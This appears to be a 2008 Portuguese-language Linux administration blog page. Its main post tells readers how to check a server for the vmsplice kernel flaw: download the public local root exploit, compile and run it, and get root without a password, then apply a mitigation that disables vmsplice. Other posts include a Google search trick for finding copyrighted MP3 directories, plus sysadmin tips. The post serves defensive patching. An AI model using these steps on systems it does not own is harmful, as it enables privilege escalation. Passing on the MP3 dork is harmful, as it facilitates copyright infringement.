Alertas de Segurança de Software

quarta-feira, 7 de maio de 2008

Testando e Resolvendo Vulnerabilidades locais no kernel do Linux - Alerta do CAIS 20080213

Introdução


Esta dica é um resumo e serve para testar e solucionar a falha critica, baseado no alerta de segurança gerado pelo CAIS (CAIS – Centro de Segurança a Incidentes de Segurança ) utilizando a segunda opção - Desabilitar temporariamente a função do kernel vulnerável, até o próximo reinício do sistema e habilitando no boot. A primeira opção que seria a atualização do kernel não será abordada.



Testado na distribuição:Debian, CentOs 5.

1-Como testar seu servidor:
O teste é feito baixando exploit de:

wget
http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c

Após baixar compile com o comando :
# gcc -o exploit 27704.c
Obs.: (gcc -o novo_nome_binario fonte_arquivo)

De permissão de execução:
Chmod 777 exploit

Será criado um executável:
./exploit

Copie para a pasta do usuário local, ex.:
# cp exploit /home/pedro

Entre com o comando:
su nome_do_usuario_comum (Para logar como usuário comum).

Execute o binario:
./exploit

A saída deve ser a seguinte:
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7df6000 .. 0xb7e28000
[+] root

Depois você simplesmente digita o comando “su -” e não será pedido senha alguma para root e você terá acesso pleno ao servidor como usuario máximo.

2 - Como vacinar seu servidor:
Existem duas formas:

1-Atualização o Kernel (Link de abordamento):
http://www.securityfocus.com/bid/27704/solution

2-Desabilitar temporariamente a função do kernel vulnerável, até o próximo reinício do sistema:

Baixe no link :

wget http://www.ping.uio.no/~mortehu/disable-vmsplice-if-exploitable.c

Compile disable-vmsplice-if-exploitable.c:
# gcc -o desabilita-exp disable-vmsplice-if-exploitable.c
Obs.:(gcc -o novo_nome_binario fonte_arquivo)

Será gerado seguinte binário:
./desabilita-exp

Após a execução de ./desabilita-exp não terá mais problemas com a vulnerabilidade.


A saída de execução será esta:
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
Exploit gone!

Coloque na inicialização do Sistema Operacional onde você desejar:
Ex.: /etc/rc.local ou no /etc/rcx.d

Reinicie o servidor e efetue os testes referenciados no item 1 .

Lembrando que esta medida é temporaria sem a necessidade de compilar o kernel.
Fontes:
http://www.rnp.br/cais/alertas/2008/cais-alr-20080213.html

http://www.securityfocus.com/bid/27704/info

http://archives.neohapsis.com/archives/fulldisclosure/2008-02/0268.html

Espero ter ajudado. Dúvidas e críticas construtivas estou a disposição.

segunda-feira, 5 de maio de 2008

Museu da Internet

Site onde estão arquivados todos os sites da internet, muito útil para achar versões antigas da internet ou sites fora do ar ha algum tempo, segue o link abaixo:
http://web.archive.org/

Instalar, configurar QMAIL

Link do QMAIL-ROCKS:
http://www.qmailrocks.org/

quarta-feira, 30 de abril de 2008

Dica para encontrar MP3 usando o Google

Colaboração: Raul Libório
Os robôs do Google indexam todo o conteúdo livre que acham pela frente.Assim, além de páginas web e vários formatos de arquivos, o motorconsegue indexar pastas inteiras com mp3, filmes, livros e documentos.

Muitas pessoas têm diretórios em seus servidores somente para armazenare compartilhar mp3. Como o Google vasculha tudo, ele acaba encontrandoesses diretórios e indexando-os. Para achá-los, basta usar os parâmetroscertos, e discografias inteiras de alguns artistas podem ser encontradaspelo buscador.

O parâmetro a seguir encontra justamente essas fontes de mp3. Bastasubstituir o nome da banda citado aqui pela de sua preferência, ou entãopelo nome da música a ser procurada. Pode-se trabalhar na busca tambémpara que o buscador exiba filmes e outros tipos de documentos.

Ex¹:Buscando músicas do Manowar
-inurl:htm -inurl:html intitle:"index of" "Last modified" mp3 "Manowar"


Sabemos que é ilegal baixar mp3 direto protegidos por direitos autoraissem autorização na internet, mas este é um recurso interessante que podeser utilizado também para qualquer outro tipo de arquivo.

fonte: Undergoogle

Sistema de Administração de Firewall para Linux

Em breve estarei postando detalhes do Sitema de Gerênciamento de Firewall para Servidores LINUX desenvolvido por mim utilizando as linguagens de programação PHP E SHELL SCRIPT.O sistema foi desenvolvido para Administrar Servidor de Firewall com IPTABLES sem que o administrador saiba algo de Linux.

Problemas com winbind depois de atualizar Windows 2000

Descrição:
Isto serve para os aflitos que nem eu que possuem Windows 2000 com AD e domínio do mesmo, servindo aos demais servidores Linux como base autenticação de usuários (Squid, Sambam etc).

Problema: Em Novembro de 2006, após mandar o W2k atualizar e reiniciá-lo, o winbind de todos os outros servidores Linux pararam de funcionar.
Com os comandos:

# wbinfo -t (Saída com êxito)
# wbinfo -u (Saída com erros)

Solução temporária: Devido ao "Update Rollup 1 for Windows 2000 SP4 and known issues", após remover esta atualização voltou a funcionar, mas bagunçou a base do winbind.
O problema provavelmente foi a barreira da API POSIX que a MICROSOFT criou;

MS04-020A vulnerability in POSIX could allow code execution 841872

Mais detalhes em: http://support.microsoft.com/?scid=kb%3Ben-us%3B891861
Nova barreira imposta pela Microsoft ao mundo livre e agora no começo do ano vamos migrar nossa base por completo para LDAP, acabando com esta salada Linux e Microsoft.

Espero que possa ter ajudado.

Pedro Al Pacheco